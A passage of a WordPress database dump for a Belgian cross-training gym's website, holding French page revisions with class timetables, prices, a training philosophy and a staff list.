class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 19:02:56', '2013-07-03 19:02:56', '', 11, 'http://www.crosstrainingcenter.be/?p=223', 0, 'revision', '', 0),
(224, 1, '2013-06-16 13:58:09', '2013-06-16 13:58:09', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-102 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:58:09', '2013-06-16 13:58:09', '', 5, 'http://www.crosstrainingcenter.be/?p=224', 0, 'revision', '', 0),
(225, 1, '2013-07-03 19:05:33', '2013-07-03 19:05:33', '<h2>Prix</h2>\r\n\r\n<table>\r\n<tbody>\r\n<tr >\r\n<td class=\"ttitreh\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcellule\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr >\r\n<td class=\"ttitreh\">Package alimentation + sport</td>\r\n<td class=\"tcellule\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr >\r\n<td class=\"ttitreh\">Coaching nutritionnel</td>\r\n<td class=\"tcellule\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-3', '', '', '2013-07-03 19:05:33', '2013-07-03 19:05:33', '', 214, 'http://www.crosstrainingcenter.be/?p=225', 0, 'revision', '', 0),
(226, 1, '2013-07-03 19:06:31', '2013-07-03 19:06:31', '<h2>Prix</h2>\r\n\r\n<table>\r\n<tbody>\r\n<tr >\r\n<td class=\"ttitreh\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcellule\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr >\r\n<td class=\"ttitreh\">Package alimentation + sport</td>\r\n<td class=\"tcellule\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr >\r\n<td class=\"ttitreh\">Coaching nutritionnel</td>\r\n<td class=\"tcellule\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-4', '', '', '2013-07-03 19:06:31', '2013-07-03 19:06:31', '', 214, 'http://www.crosstrainingcenter.be/?p=226', 0, 'revision', '', 0),
(342, 2, '2013-07-03 20:45:08', '2013-07-03 20:45:08', '<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-9', '', '', '2013-07-03 20:45:08', '2013-07-03 20:45:08', '', 214, 'http://www.crosstrainingcenter.be/214-revision-9/', 0, 'revision', '', 0),
(227, 1, '2013-07-03 19:09:04', '2013-07-03 19:09:04', '<h2>Prix</h2>\r\n\r\n<table>\r\n<tbody>\r\n<tr >\r\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr >\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr >\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-5', '', '', '2013-07-03 19:09:04', '2013-07-03 19:09:04', '', 214, 'http://www.crosstrainingcenter.be/?p=227', 0, 'revision', '', 0),
(228, 1, '2013-07-03 19:10:20', '2013-07-03 19:10:20', '<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcelluleprix\"><strong>1 séance :</strong> 9.00€\r\n<strong>1 carte de 10 séances :</strong> 80.00€ (valable 3 mois)\r\n<strong>1 carte de 20 séances :</strong> 120.00€ (valable 4 mois)\r\n<strong>Abonnement 1 mois illimité :</strong> 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-6', '', '', '2013-07-03 19:10:20', '2013-07-03 19:10:20', '', 214, 'http://www.crosstrainingcenter.be/?p=228', 0, 'revision', '', 0),
(230, 1, '2013-07-03 19:06:30', '2013-07-03 19:06:30', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 19:06:30', '2013-07-03 19:06:30', '', 11, 'http://www.crosstrainingcenter.be/?p=230', 0, 'revision', '', 0),
(229, 1, '2013-07-03 19:11:24', '2013-07-03 19:11:24', '<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcelluleprix\"><strong>1 séance :</strong> 9.00€\r\n<strong>1 carte de 10 séances :</strong> 80.00€ (valable 3 mois)\r\n<strong>1 carte de 20 séances :</strong> 120.00€ (valable 4 mois)\r\n<strong>Abonnement 1 mois illimité :</strong> 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\"><strong>1er rendez-vous : bilan alimentaire et programme personnalisé :</strong> 50.00€\r\n<strong>Suivi</strong> 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-7', '', '', '2013-07-03 19:11:24', '2013-07-03 19:11:24', '', 214, 'http://www.crosstrainingcenter.be/?p=229', 0, 'revision', '', 0),
(231, 1, '2013-07-03 19:12:49', '2013-07-03 19:12:49', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 19:12:49', '2013-07-03 19:12:49', '', 11, 'http://www.crosstrainingcenter.be/?p=231', 0, 'revision', '', 0),
(233, 1, '2013-07-03 19:31:37', '2013-07-03 19:31:37', '', 'damien_pierrard-pti', '', 'inherit', 'open', 'open', '', 'damien_pierrard-pti', '', '', '2013-07-03 19:31:37', '2013-07-03 19:31:37', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg', 0, 'attachment', 'image/jpeg', 0),
(234, 1, '2013-07-03 19:31:45', '2013-07-03 19:31:45', '', 'guelor-pti', '', 'inherit', 'open', 'open', '', 'guelor-pti', '', '', '2013-07-03 19:31:45', '2013-07-03 19:31:45', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg', 0, 'attachment', 'image/jpeg', 0),
(235, 1, '2013-07-03 19:31:52', '2013-07-03 19:31:52', '', 'julie_pierrard-pti', '', 'inherit', 'open', 'open', '', 'julie_pierrard-pti', '', '', '2013-07-03 19:31:52', '2013-07-03 19:31:52', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg', 0, 'attachment', 'image/jpeg', 0),
(236, 1, '2013-07-03 19:31:58', '2013-07-03 19:31:58', '', 'julien_meulemans-pti', '', 'inherit', 'open', 'open', '', 'julien_meulemans-pti', '', '', '2013-07-03 19:31:58', '2013-07-03 19:31:58', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg', 0, 'attachment', 'image/jpeg', 0),
(237, 1, '2013-07-03 19:32:05', '2013-07-03 19:32:05', '', 'mathieu_gille-pti', '', 'inherit', 'open', 'open', '', 'mathieu_gille-pti', '', '', '2013-07-03 19:32:05', '2013-07-03 19:32:05', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg', 0, 'attachment', 'image/jpeg', 0),
(238, 1, '2013-07-03 19:06:30', '2013-07-03 19:06:30', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td 